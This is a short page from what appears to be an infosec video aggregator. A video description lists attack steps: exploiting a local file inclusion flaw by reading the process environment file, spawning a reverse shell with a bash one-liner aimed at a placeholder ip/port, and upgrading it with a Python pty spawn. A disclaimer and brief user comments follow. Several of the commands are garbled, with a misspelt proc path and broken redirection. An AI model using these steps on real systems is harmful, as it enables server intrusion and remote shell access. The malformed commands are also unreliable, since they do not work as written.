Description: bypass LFI by reading /proc/sel/./environ
spawn reverse shelll by executing :
/bin/bash -i > /ip/port 0&1
Geting TTY by executing :
python -c 'import pty; pty.spawn("/bin/bash")'
Tags: reverse shell , LFI ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
This video is private????
Public Now !
Pretty nice one. There's a pretty decent discussion of several LFI/RFI tactics here: http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/ . Also linked to that page is a large list of possible lfi stems compiled by Rsnake.
Please write the meaningful description next time instead of lines in terminal.
Thank you.